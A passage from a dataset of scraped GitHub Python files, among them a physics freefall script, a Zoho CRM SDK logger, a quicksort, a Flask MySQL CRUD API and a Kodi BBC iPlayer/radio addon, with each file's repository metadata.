c_speed), 3), \"c\")\n print(\"Speed of light: \", c_speed, \" m/s\")\n print(\"Iterations: \", inc_count)\n\ndef calcGravity(alt_inc):\n grav_new = ((r_earth / (r_earth + alt_inc)) ** 2)\n grav_new *= grav_const\n return grav_new\n\ndef calcTime(time_inc, iter, grav_new, vel_inc):\n time_inc = -((math.sqrt((2 * iter * grav_new) + math.pow(vel_inc, 2)) + vel_inc) / grav_new)\n # time_inc = math.sqrt((2 * iter) / grav_new)\n return time_inc\n\ndef calcVelocity(grav_new, time_inc):\n vel_inc = (grav_new * time_inc)\n return vel_inc\n\n\ndef main(iter, alt):\n\n # cast arguments to floats to avoid bugs\n # convert kilometers to meters\n alt = alt * 1000\n # already in meters or fractions of meters\n\n inc_count = 0 # iteration counter for debugging\n\n alt_inc = alt # assign total altitude to counter variable\n\n grav_new = calcGravity(alt_inc) # initial gravity at 0 velocity\n\n time_inc = 0 # time increment in fractions of seconds\n time_total = 0 # time totaled from increments\n\n vel_inc = calcVelocity(grav_new, time_inc) # velocity at each step\n vel_total = 0 # total velocity summed from acceleration operations\n\n while (alt_inc > 0):\n # import pdb; pdb.set_trace() # start debug\n\n # find time taken to travel iter given grav_new\n time_inc = calcTime(time_inc, iter, grav_new, vel_inc)\n\n # add time increment to total\n time_total += time_inc\n\n # find new altitude\n alt_inc -= iter\n\n # re-evaluate gravity at new altitude\n grav_new = calcGravity(alt_inc)\n\n vel_inc = calcVelocity(grav_new, time_inc)\n\n vel_total += vel_inc\n\n inc_count += 1\n\n # if (inc_count < 10):\n # print(time_inc, \"\\n\", time_total)\n # /while\n\n printOutput(alt, iter, time_total, vel_total, inc_count)\n# /main\n\nmain(sys.argv[1], sys.argv[2])\n\n# py timeforacceleration.py .1 400\n","repo_name":"thespacemans/misc_stuff","sub_path":"FreefallCalc/timeforaccelerationv2.py","file_name":"timeforaccelerationv2.py","file_ext":"py","file_size_in_byte":2472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"14690185032","text":"try:\n import logging\n from zcrmsdk.src.com.zoho.crm.api.exception.sdk_exception import SDKException\n from ...crm.api.util.constants import Constants\nexcept:\n from ...crm.api.util.constants import Constants\n from zcrmsdk.src.com.zoho.crm.api.exception import SDKException\n\n\nclass Logger(object):\n\n \"\"\"\n This class represents the Logger level and the file path.\n \"\"\"\n\n def __init__(self, level, file_path=None):\n self.__level = level\n self.__file_path = file_path\n\n def get_level(self):\n \"\"\"\n This is a getter method to get __level.\n\n Returns:\n string: A enum representing __level\n \"\"\"\n\n return self.__level\n\n def get_file_path(self):\n \"\"\"\n This is a getter method to get __file_path.\n\n Returns:\n string: A string representing __file_path\n \"\"\"\n\n return self.__file_path\n\n @staticmethod\n def get_instance(level, file_path=None):\n\n \"\"\"\n Creates an Logger class instance with the specified log level and file path.\n :param level: A Levels class instance containing the log level.\n :param file_path: A str containing the log file path.\n :return: A Logger class instance.\n \"\"\"\n\n return Logger(level=level, file_path=file_path)\n\n import enum\n\n class Levels(enum.Enum):\n\n \"\"\"\n This class represents the possible logger levels\n \"\"\"\n\n CRITICAL = logging.CRITICAL\n ERROR = logging.ERROR\n WARNING = logging.WARNING\n INFO = logging.INFO\n DEBUG = logging.DEBUG\n NOTSET = logging.NOTSET\n\n\nclass SDKLogger(object):\n\n \"\"\"\n The class to initialize the SDK logger.\n \"\"\"\n\n def __init__(self, logger_instance):\n\n logger = logging.getLogger('SDKLogger')\n logger_level = logger_instance.get_level()\n logger_file_path = logger_instance.get_file_path()\n if logger_level is not None and logger_level != logging.NOTSET and logger_file_path is not None and logger_file_path != \"\":\n file_handler = logging.FileHandler(logger_file_path)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(module)s - %(filename)s - %(funcName)s - %(lineno)d - %(message)s')\n file_handler.setLevel(logger_level.name)\n file_handler.setFormatter(formatter)\n logger.addHandler(file_handler)\n if logger_level is not None and Constants.LOGGER_LEVELS.__contains__(logger_level.name):\n logger.setLevel(logger_level.name)\n\n @staticmethod\n def initialize(logger_instance):\n try:\n SDKLogger(logger_instance=logger_instance)\n except Exception as ex:\n raise SDKException(message=Constants.LOGGER_INITIALIZATION_ERROR, Exception=ex)\n","repo_name":"zoho/zohocrm-python-sdk-2.1","sub_path":"zcrmsdk/src/com/zoho/api/logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"35850359968","text":"# -*- coding: utf-8 -*-\n\n#Use Quicksort to sort given collection by desired coordinate\ndef partition(alist, i):\n count = 0\n li = [] \n mid_pos = (len(alist)+1)//2\n mid_element = alist[mid_pos-1]\n if alist[0][i] < mid_element[i] < alist[-1][i] \\\n or alist[-1][i] < mid_element[i] < alist[0][i]:\n alist[0], alist[mid_pos-1] = alist[mid_pos-1], alist[0]\n if alist[0][i] < alist[-1][i] < mid_element[i] \\\n or mid_element[i] < alist[-1][i] < alist[0][i]:\n alist[0], alist[-1] = alist[-1], alist[0]\n start = 0\n pivot = alist[start]\n pindex = start+1\n for j in range(start+1, len(alist)):\n count = count + 1\n if alist[j][i] < pivot[i]:\n alist[j], alist[pindex] = alist[pindex], alist[j]\n pindex += 1\n li.append(count)\n alist[start], alist[pindex-1] = alist[pindex-1], alist[start]\n return alist[:pindex], alist[pindex:]\n\ndef quicksort(alist, i):\n start = 0\n end = len(alist)-1\n if start msgcount:\n bigperson = key\n msgcount = value\n\nprint(bigperson, msgcount)\n","repo_name":"samtaitai/py4e","sub_path":"exercise0904.py","file_name":"exercise0904.py","file_ext":"py","file_size_in_byte":683,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73172410348","text":"from rest_framework import serializers\nfrom rest_framework.serializers import ModelSerializer, Serializer\n\nfrom .models import Accounts\n\nclass AccountSerializer(ModelSerializer):\n\n class Meta:\n model = Accounts\n fields = (\n 'id',\n 'label',\n )\n read_only_fields = (\n 'id',\n )\n","repo_name":"ashraful-ic/accounts","sub_path":"accounts/transaction/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71925465067","text":"\nfrom flask import Flask, render_template, jsonify,request\nfrom flask_mysqldb import MySQL\nfrom flask_cors import CORS, cross_origin\n\napp = Flask(__name__) #variables globales\ncors= CORS(app)\n\n#configuracion de MySQL\napp.config['CORS_HEADERS'] ='Content-Type'\napp.config['MYSQL_HOST']= 'localhost'\napp.config['MYSQL_USER']= 'root'\napp.config['MYSQL_PASSWORD']= ''\napp.config['MYSQL_DB']= 'system'\n\n#inicializar\nmysql = MySQL(app)\n\n\n@app.route('/api/customers') #se usa GET\n@cross_origin() #permite que se pueda llamar de puertos y paginas web diferentes\ndef getAllCustomers():\n\n cur=mysql.connection.cursor()\n cur.execute('SELECT * FROM customers')\n data = cur.fetchall()#traemos todo lo que hallamos consultado\n result= []\n for row in data:\n content = {\n 'id':row[0],\n 'Nombre' : row[1], \n 'Apellido':row[2], \n 'email' : row[3], \n 'telefono' :row[4] , \n 'direccion': row[5]\n }\n\n result.append(content)\n return jsonify(result)#funcion que convierte el resultado en json\n \n\n@app.route('/api/customers/')# _se usa GET(siempre que llamamos a una URL)\n@cross_origin()\ndef getCustomer(id): \n cur=mysql.connection.cursor()\n cur.execute('SELECT * FROM customers WHERE id ='+ str(id))\n data = cur.fetchall()#traemos todo lo que hallamos consultado\n content={}\n for row in data:\n content = {\n 'id':row[0],\n 'Nombre' : row[1], \n 'Apellido':row[2], \n 'email' : row[3], \n 'telefono' :row[4] , \n 'direccion': row[5]\n \n }\n \n return jsonify(content)#funcion que convierte el resultado en json\n \n\n@app.route('/api/customers',methods=['POST']) #Se una POST\n\n@cross_origin()\ndef createCustomer():\n\n\n if 'id' in request.json: #buscara si en la request hay id si lo hay modifica y sino crea\n updateCustomer()\n else:\n createCustomer()\n\n return 'ok' \n\ndef createCustomer(): \n cur= mysql.connection.cursor()#devuelve objeto que nos permite modificar la BD\n cur.execute(\"INSERT INTO `customers` (`id`, `nombre`, `apellido`, `email`, `telefono`, `direccion`) VALUES (NULL, %s, %s, %s, %s, %s);\", \n (request.json['nombre'], request.json['apellido'], request.json['email'], request.json['telefono'], request.json['direccion']))\n mysql.connection.commit()#Empaqueta los llamados y los envia a la bd\n return 'Cliente Guardado'\n\ndef updateCustomer(): \n cur= mysql.connection.cursor()#devuelve objeto que nos permite modificar la BD\n cur.execute(\"UPDATE `customers` SET `nombre` = %s, `apellido` = %s, `email` = %s, `telefono` = %s, `direccion` = %s WHERE `customers`.`id` = %s;\",\n (request.json['nombre'], request.json['apellido'], request.json['email'], request.json['telefono'], request.json['direccion'], request.json['id'])) \n mysql.connection.commit()#Empaqueta los llamados y los envia a la bd\n return 'Cliente Guardado'\n\n\n\n\n@app.route('/api/customers/',methods=['DELETE']) #Se una POST(y se usa el ID para poder eliminar un cliente en especifico y no a todos los clientes \"pensar en el where de la bd\")\n@cross_origin()\ndef removeCustomer(id):\n cur= mysql.connection.cursor()#devuelve objeto que nos permite modificar la BD\n cur.execute(\"DELETE FROM `customers` WHERE `customers`.`id` = \"+str(id) +\";\")#convertimos el id (que es int) en un str y lo hacemos dinamico (para que no solo reciba un id sino que pueda pasarse cualquiera)\n mysql.connection.commit()\n return 'Cliente Eliminado'\n\n\n\n@app.route('/')#ruta por defecto\n@cross_origin()\n\ndef index():\n return render_template('index.html')\n\n\n@app.route('//')\n@cross_origin()\ndef publicFile(path):\n return render_template(path)\n\n\nif __name__ == '__main__':\n app.run(None, 3000, True)","repo_name":"J-o-s-eandres/crud-flask","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3895,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"32047469213","text":"# -*- coding: utf-8 -*-\n\nfrom xbmcswift2 import Plugin, ListItem\nfrom xbmcswift2 import actions\nimport xbmc,xbmcaddon,xbmcvfs,xbmcgui,xbmcplugin\nimport re\nimport requests,urllib\nimport os,sys\nimport xml.etree.ElementTree as ET\nimport base64\nimport datetime\nimport random\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nplugin = Plugin()\nbig_list_view = False\n\ndef log(v):\n xbmc.log(repr(v),xbmc.LOGERROR)\n\ndef get_icon_path(icon_name):\n addon_path = xbmcaddon.Addon().getAddonInfo(\"path\")\n return os.path.join(addon_path, 'resources', 'img', icon_name+\".png\")\n\ndef remove_formatting(label):\n label = re.sub(r\"\\[/?[BI]\\]\",'',label)\n label = re.sub(r\"\\[/?COLOR.*?\\]\",'',label)\n return label\n\ndef escape( str ):\n str = str.replace(\"'\",\"'\")\n str = str.replace(\"&\", \"&\")\n str = str.replace(\"<\", \"<\")\n str = str.replace(\">\", \">\")\n str = str.replace(\"\\\"\", \""\")\n return str\n\ndef unescape( str ):\n str = str.replace(\"<\",\"<\")\n str = str.replace(\">\",\">\")\n str = str.replace(\""\",\"\\\"\")\n str = str.replace(\"&\",\"&\")\n str = str.replace(\"'\",\"'\")\n str = str.replace(\"'\",\"'\")\n return str\n\ndef get(url,proxy=False):\n headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1; rv:50.0) Gecko/20100101 Firefox/50.0'}\n if proxy:\n headers['Referer'] = 'http://www.justproxy.co.uk/'\n url = 'http://www.justproxy.co.uk/index.php?q=%s' % base64.b64encode(url)\n #log(url)\n try:\n #llog((\"GGG\",url))\n r = requests.get(url,headers=headers,verify=False)\n #llog((\"RRR\",r))\n except:\n return\n if r.status_code != requests.codes.ok:\n return\n html = r.content\n #log(html)\n return html\n\n@plugin.route('/reset_cached')\ndef reset_cached():\n cached = plugin.get_storage('cached')\n cached.clear()\n\n@plugin.route('/schedule//')\ndef schedule(url,name):\n data = get(url)\n schedule = ET.fromstring(data)\n days = schedule.findall(\"day\")\n items = []\n if plugin.get_setting('autoplay') == 'true':\n autoplay = True\n action = \"autoplay\"\n else:\n autoplay = False\n action = \"list\"\n for day in days:\n first = True\n broadcasts = day[0]\n for broadcast in broadcasts:\n pid = broadcast.find(\"pid\").text\n start = broadcast.find(\"start\").text\n if first:\n date = start[0:10]\n first = False\n items.append({\n 'label' : \"[COLOR yellow][B]%s[/B][/COLOR]\" % date,\n 'thumbnail' : get_icon_path(\"calendar\"),\n 'path' : '',\n 'is_playable' : False,\n })\n end = broadcast.find(\"end\").text\n programme = broadcast.find(\"programme\")\n is_available = programme.find(\"is_available_mediaset_pc_sd\").text\n pid = programme.find(\"pid\").text\n display_titles = programme.find(\"display_titles\")\n image = programme.find(\"image\")\n image_pid = image.find(\"pid\").text\n title = display_titles.find(\"title\").text\n subtitle = display_titles.find(\"subtitle\").text\n if subtitle == None:\n subtitle = \"\"\n else:\n subtitle = \"- %s\" % subtitle\n NAME = \"[COLOR dimgray]%s-%s[/COLOR] %s %s\" % (start[11:16],end[11:16],title,subtitle)\n episode_url = 'http://www.bbc.co.uk/iplayer/episode/%s' % pid\n thumbnail = 'https://ichef.bbci.co.uk/images/ic/336x189/%s.jpg' % image_pid\n play_name = \"%s %s\" % (title,subtitle)\n if is_available == \"1\":\n URL = plugin.url_for('play_episode',url=episode_url,name=play_name,thumbnail=thumbnail,action=action)\n NAME = \"[COLOR %s]%s[/COLOR]\" % (remove_formatting(plugin.get_setting('catchup.colour')),NAME)\n else:\n URL = plugin.url_for('schedule',url=url, name=name)\n context_items = []\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add Favourite', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_favourite, name=play_name, url=episode_url, thumbnail=thumbnail, is_episode=True))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Add to PVR', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for(add_pvr, name=play_name, url=episode_url, thumbnail=thumbnail, is_episode=True))))\n context_items.append((\"[COLOR yellow][B]%s[/B][/COLOR] \" % 'Cache', 'XBMC.RunPlugin(%s)' %\n (plugin.url_for('play_episode',url=episode_url,name=play_name,thumbnail=thumbnail,action=\"cache\"))))\n items.append({\n 'label' : NAME,\n 'thumbnail' : thumbnail,\n 'path' : URL,\n 'is_playable' : autoplay,\n 'context_menu': context_items,\n })\n\n return items\n\n@plugin.route('/schedule_period///')\ndef schedule_period(url,name,thumbnail):\n items = []\n for period in [\"today\",\"tomorrow\",\"yesterday\",\"this_week\",\"next_week\",\"last_week\"]:\n icon = 'special://home/addons/plugin.audio.bbc/resources/img/%s.png' % id\n URL = url.replace('today',period)\n items.append({\n 'label' : \"%s - %s\" % (name,period.replace('_',' ').title()),\n 'thumbnail' : icon,\n 'path' : plugin.url_for('schedule',url=URL, name=name),\n 'is_playable' : False\n })\n return items\n\n@plugin.route('/schedules')\ndef schedules():\n channels = [\n ('bbc_one_hd', \"BBC One\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/hd/today.xml\"),\n ('bbc_two_hd', \"BBC Two\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/hd/today.xml\"),\n ('bbc_four_hd', \"BBC Four\", \"http://www.bbc.co.uk/bbcfour/programmes/schedules/today.xml\"),\n ('bbc_news24', \"BBC News\", \"http://www.bbc.co.uk/bbcnews/programmes/schedules/today.xml\"),\n ('bbc_parliament', \"BBC Parliament\", \"http://www.bbc.co.uk/bbcparliament/programmes/schedules/today.xml\"),\n ('cbbc_hd', \"CBBC\", \"http://www.bbc.co.uk/cbbc/programmes/schedules/today.xml\"),\n ('cbeebies_hd', \"CBeebies\", \"http://www.bbc.co.uk/cbeebies/programmes/schedules/today.xml\"),\n ('bbc_alba', \"Alba\", \"http://www.bbc.co.uk/bbcalba/programmes/schedules/today.xml\"),\n ('s4cpbs', \"S4C\", \"http://www.bbc.co.uk/s4c/programmes/schedules/today.xml\"),\n ('bbc_one_hd', \"BBC One Cambridgeshire\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/cambridge/today.xml\"),\n ('bbc_one_hd', \"BBC One Channel Islands\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/channel_islands/today.xml\"),\n ('bbc_one_hd', \"BBC One East\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/east/today.xml\"),\n ('bbc_one_hd', \"BBC One East Midlands\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/east_midlands/today.xml\"),\n ('bbc_one_hd', \"BBC One Yorks & Lincs\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/east_yorkshire/today.xml\"),\n ('bbc_one_hd', \"BBC One HD\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/hd/today.xml\"),\n ('bbc_one_hd', \"BBC One London\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/london/today.xml\"),\n ('bbc_one_hd', \"BBC One Northern Ireland\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/ni/today.xml\"),\n ('bbc_one_hd', \"BBC One Northern Ireland HD\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/ni_hd/today.xml\"),\n ('bbc_one_hd', \"BBC One North East & Cumbria\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/north_east/today.xml\"),\n ('bbc_one_hd', \"BBC One North West\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/north_west/today.xml\"),\n ('bbc_one_hd', \"BBC One Oxfordshire\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/oxford/today.xml\"),\n ('bbc_one_hd', \"BBC One Scotland\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/scotland/today.xml\"),\n ('bbc_one_hd', \"BBC One Scotland HD\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/scotland_hd/today.xml\"),\n ('bbc_one_hd', \"BBC One South\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/south/today.xml\"),\n ('bbc_one_hd', \"BBC One South East\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/south_east/today.xml\"),\n ('bbc_one_hd', \"BBC One South West\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/south_west/today.xml\"),\n ('bbc_one_hd', \"BBC One Wales\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/wales/today.xml\"),\n ('bbc_one_hd', \"BBC One Wales HD\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/wales_hd/today.xml\"),\n ('bbc_one_hd', \"BBC One West\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/west/today.xml\"),\n ('bbc_one_hd', \"BBC One West Midlands\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/west_midlands/today.xml\"),\n ('bbc_one_hd', \"BBC One Yorkshire\", \"http://www.bbc.co.uk/bbcone/programmes/schedules/yorkshire/today.xml\"),\n ('bbc_two_hd', \"BBC Two Wales\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/wales/today.xml\"),\n ('bbc_two_hd', \"BBC Two Scotland\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/scotland/today.xml\"),\n ('bbc_two_hd', \"BBC Two England\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/england/today.xml\"),\n ('bbc_two_hd', \"BBC Two Northern Ireland\", \"http://www.bbc.co.uk/bbctwo/programmes/schedules/ni/today.xml\"),\n ]\n items = []\n for id, name, url in channels:\n icon = 'special://home/addons/plugin.audio.bbc/resources/img/%s.png' % id\n items.append({\n 'label' : name,\n 'thumbnail' : icon,\n 'path' : plugin.url_for('schedule_period',url=url, name=name, thumbnail=icon),\n 'is_playable' : False\n })\n\n return items\n\n@plugin.route('/red_button')\ndef red_button():\n items = []\n device = 'abr_hdtv'\n provider = 'ak'\n for suffix in ['','b']:\n for i in range(1,25):\n id = \"sport_stream_%02d%s\" % (i,suffix)\n name = \"Red Button %02d%s\" % (i,suffix)\n url='http://a.files.bbci.co.uk/media/live/manifesto/audio_video/webcast/hls/uk/%s/%s/%s.m3u8' % (device, provider, id)\n icon = 'special://home/addons/plugin.audio.bbc/resources/img/red_button.png'\n if plugin.get_setting('autoplay') == 'true':\n items.append({\n 'label' : name,\n 'thumbnail' : icon,\n 'path' : url,\n 'is_playable' : True\n })\n else:\n items.append({\n 'label' : name,\n 'thumbnail' : icon,\n 'path' : plugin.url_for('live_list',url=url, name=name, thumbnail=icon),\n 'is_playable' : False\n })\n return items\n\n@plugin.route('/make_playlist')\ndef make_playlist():\n hd = [\n ('bbc_one_hd', 'BBC One'),\n ('bbc_two_hd', 'BBC Two'),\n ('bbc_four_hd', 'BBC Four'),\n ('cbbc_hd', 'CBBC'),\n ('cbeebies_hd', 'CBeebies'),\n ('bbc_one_scotland_hd', 'BBC One Scotland'),\n ('bbc_one_northern_ireland_hd', 'BBC One Northern Ireland'),\n ('bbc_one_wales_hd', 'BBC One Wales'),\n\n ]\n sd = [\n ('bbc_news24', 'BBC News Channel'),\n ('bbc_parliament', 'BBC Parliament'),\n ('bbc_alba', 'Alba'),\n ('s4cpbs', 'S4C'),\n ('bbc_two_scotland', 'BBC Two Scotland'),\n ('bbc_two_northern_ireland_digital', 'BBC Two Northern Ireland'),\n ('bbc_two_wales_digital', 'BBC Two Wales'),\n ('bbc_two_england', 'BBC Two England'),\n ('bbc_one_london', 'BBC One London'),\n ('bbc_one_cambridge', 'BBC One Cambridge'),\n ('bbc_one_channel_islands', 'BBC One Channel Islands'),\n ('bbc_one_east', 'BBC One East'),\n ('bbc_one_east_midlands', 'BBC One East Midlands'),\n ('bbc_one_east_yorkshire', 'BBC One East Yorkshire'),\n ('bbc_one_north_east', 'BBC One North East'),\n ('bbc_one_north_west', 'BBC One North West'),\n ('bbc_one_oxford', 'BBC One Oxford'),\n ('bbc_one_south', 'BBC One South'),\n ('bbc_one_south_east', 'BBC One South East'),\n ('bbc_one_west', 'BBC One West'),\n ('bbc_one_west_midlands', 'BBC One West Midlands'),\n ('bbc_one_yorks', 'BBC One Yorks')\n ]\n\n items = []\n\n device = 'abr_hdtv'\n provider = 'ak'\n urls = []\n for id, name in hd :\n url='http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/hls/uk/%s/%s/%s.m3u8' % (device, provider, id)\n urls.append((name,url))\n device = 'hls_mobile_wifi'\n for id, name in sd :\n url='http://a.files.bbci.co.uk/media/live/manifesto/audio_video/simulcast/hls/uk/%s/%s/%s.m3u8' % (device, provider, id)\n urls.append((name,url))\n\n playlist = xbmcvfs.File('special://profile/addon_data/plugin.audio.bbc/BBC.m3u8','wb')\n playlist.write('#EXTM3U\\n')\n for name,url in urls:\n html = get(url)\n match=re.compile('#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=(.+?),CODECS=\"(.+?)\",RESOLUTION=(.+?)\\n(.+?)$',flags=(re.DOTALL | re.MULTILINE)).findall(html)\n for bandwidth,codec,resolution,stream_url in sorted(match, key=lambda x: int(x[0]), reverse=True):\n if bandwidth <= plugin.get_setting('live.bandwidth'):\n playlist.write('#EXTINF:0,%s\\n%s\\n' % (name,stream_url))\n break\n playlist.close()\n\n\n\n@plugin.route('/live')\ndef live():\n channel_list = [\n ('bbc_radio_one', 'BBC Radio 1'),\n ('bbc_1xtra', 'BBC Radio 1Xtra'),\n ('bbc_radio_two', 'BBC Radio 2'),\n ('bbc_radio_three', 'BBC Radio 3'),\n ('bbc_radio_fourfm', 'BBC Radio 4 FM'),\n ('bbc_radio_fourlw', 'BBC Radio 4 LW'),\n ('bbc_radio_four_extra', 'BBC Radio 4 Extra'),\n ('bbc_radio_five_live', 'BBC Radio 5 live'),\n ('bbc_radio_five_live_sports_extra', 'BBC Radio 5 live sports extra'),\n ('bbc_6music', 'BBC Radio 6 Music'),\n ('bbc_asian_network', 'BBC Asian Network'),\n ('bbc_radio_scotland_fm', 'BBC Radio Scotland'),\n ('bbc_radio_nan_gaidheal', u'BBC Radio nan Gàidheal'),\n ('bbc_radio_ulster', 'BBC Radio Ulster'),\n ('bbc_radio_foyle', 'BBC Radio Foyle'),\n ('bbc_radio_wales_fm', 'BBC Radio Wales'),\n ('bbc_radio_cymru', 'BBC Radio Cymru'),\n ('bbc_radio_berkshire', 'BBC Radio Berkshire'),\n ('bbc_radio_bristol', 'BBC Radio Bristol'),\n ('bbc_radio_cambridge', 'BBC Radio Cambridgeshire'),\n ('bbc_radio_cornwall', 'BBC Radio Cornwall'),\n ('bbc_radio_coventry_warwickshire', 'BBC Coventry & Warwickshire'),\n ('bbc_radio_cumbria', 'BBC Radio Cumbria'),\n ('bbc_radio_derby', 'BBC Radio Derby'),\n ('bbc_radio_devon', 'BBC Radio Devon'),\n ('bbc_radio_essex', 'BBC Essex'),\n ('bbc_radio_gloucestershire', 'BBC Radio Gloucestershire'),\n ('bbc_radio_guernsey', 'BBC Radio Guernsey'),\n ('bbc_radio_hereford_worcester', 'BBC Hereford & Worcester'),\n ('bbc_radio_humberside', 'BBC Radio Humberside'),\n ('bbc_radio_jersey', 'BBC Radio Jersey'),\n ('bbc_radio_kent', 'BBC Radio Kent'),\n ('bbc_radio_lancashire', 'BBC Radio Lancashire'),\n ('bbc_radio_leeds', 'BBC Radio Leeds'),\n ('bbc_radio_leicester', 'BBC Radio Leicester'),\n ('bbc_radio_lincolnshire', 'BBC Radio Lincolnshire'),\n ('bbc_london', 'BBC Radio London'),\n ('bbc_radio_manchester', 'BBC Radio Manchester'),\n ('bbc_radio_merseyside', 'BBC Radio Merseyside'),\n ('bbc_radio_newcastle', 'BBC Newcastle'),\n ('bbc_radio_norfolk', 'BBC Radio Norfolk'),\n ('bbc_radio_northampton', 'BBC Radio Northampton'),\n ('bbc_radio_nottingham', 'BBC Radio Nottingham'),\n ('bbc_radio_oxford', 'BBC Radio Oxford'),\n ('bbc_radio_sheffield', 'BBC Radio Sheffield'),\n ('bbc_radio_shropshire', 'BBC Radio Shropshire'),\n ('bbc_radio_solent', 'BBC Radio Solent'),\n ('bbc_radio_somerset_sound', 'BBC Somerset'),\n ('bbc_radio_stoke', 'BBC Radio Stoke'),\n ('bbc_radio_suffolk', 'BBC Radio Suffolk'),\n ('bbc_radio_surrey', 'BBC Surrey'),\n ('bbc_radio_sussex', 'BBC Sussex'),\n ('bbc_tees', 'BBC Tees'),\n ('bbc_three_counties_radio', 'BBC Three Counties Radio'),\n ('bbc_radio_wiltshire', 'BBC Wiltshire'),\n ('bbc_wm', 'BBC WM 95.6'),\n ('bbc_radio_york', 'BBC Radio York'),\n ]\n items = []\n for id, name in channel_list:\n location = \"uk\"\n quality = \"sbr_high\"\n provider_url = \"ak\"\n url = 'http://a.files.bbci.co.uk/media/live/manifesto/audio/simulcast/hls/%s/%s/%s/%s.m3u8' % (location, quality, provider_url, id)\n items.append({\n 'label' : name,\n 'thumbnail' : \"\",\n 'path' : url,\n 'is_playable' : True\n })\n return items\n\n\n@plugin.route('/play_live///')\ndef play_live(url,name,thumbnail):\n html = get(url)\n match=re.compile('#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=(.+?),CODECS=\"(.+?)\",RESOLUTION=(.+?)\\n(.+?)$',flags=(re.DOTALL | re.MULTILINE)).findall(html)\n for bandwidth,codec,resolution,url in sorted(match, key=lambda x: int(x[0]), reverse=True):\n #label = \"%s [%s bps] %s\" % (name,bandwidth,resolution)\n if bandwidth <= plugin.get_setting('live.bandwidth'):\n item = {\n 'label' : name,\n 'thumbnail' : thumbnail,\n 'path' : url,\n 'is_playable' : True\n }\n return plugin.set_resolved_url(item)\n\n@plugin.route('/live_list///')\ndef live_list(url,name,thumbnail):\n html = get(url)\n items = []\n match=re.compile('#EXT-X-STREAM-INF:PROGRAM-ID=1,BANDWIDTH=(.+?),CODECS=\"(.+?)\",RESOLUTION=(.+?)\\n(.+?)$',flags=(re.DOTALL | re.MULTILINE)).findall(html)\n for bandwidth,codec,resolution,url in sorted(match, key=lambda x: int(x[0]), reverse=True):\n label = \"%s [%s bps] %s\" % (name,bandwidth,resolution)\n items.append({\n 'label' : label,\n 'thumbnail' : thumbnail,\n 'path' : url,\n 'is_playable' : True\n })\n return items\n\n@plugin.route('/proxy_play_episode////')\ndef proxy_play_episode(url,name,thumbnail,action):\n html = get(url)\n vpid = ''\n match = re.search(r'mediator.bind\\((.*?), document\\.getElementById\\(\\'tviplayer\\'\\)\\);', html, re.DOTALL)\n if match:\n data = match.group(1)\n import json\n json_data = json.loads(data)\n # print json.dumps(json_data, indent=2, sort_keys=True)\n name = json_data['episode']['title']\n description = json_data['episode']['synopses']['large']\n image = json_data['episode']['images']['standard'].replace('{recipe}','832x468')\n for stream in json_data['episode']['versions']:\n if ((stream['kind'] == 'original') or\n (stream['kind'] == 'iplayer-version')):\n vpid = stream_id_st = stream['id']\n\n if not vpid:\n return\n\n NEW_URL= \"http://open.live.bbc.co.uk/mediaselector/5/select/version/2.0/mediaset/apple-ipad-hls/vpid/%s\" % vpid\n html = get(NEW_URL,True)\n urls = []\n match=re.compile('application=\"(.+?)\".+?String=\"(.+?)\".+?identifier=\"(.+?)\".+?protocol=\"(.+?)\".+?server=\"(.+?)\".+?supplier=\"(.+?)\"').findall(html.replace('amp;',''))\n for app,auth , playpath ,protocol ,server,supplier in match:\n\n port = '1935'\n if protocol == 'rtmpt': port = 80\n if supplier == 'limelight':\n url=\"%s://%s:%s/ app=%s?%s tcurl=%s://%s:%s/%s?%s playpath=%s\" % (protocol,server,port,app,auth,protocol,server,port,app,auth,playpath)\n res = playpath.split('secure_auth/')[1]\n res = res.split('kbps')[0]\n urls.append([url,res])\n\n items = []\n for url,res in sorted(urls,key = lambda x: int(x[1]), reverse=True):\n\n items.append({\n 'label': \"%s [%s kbps]\" % 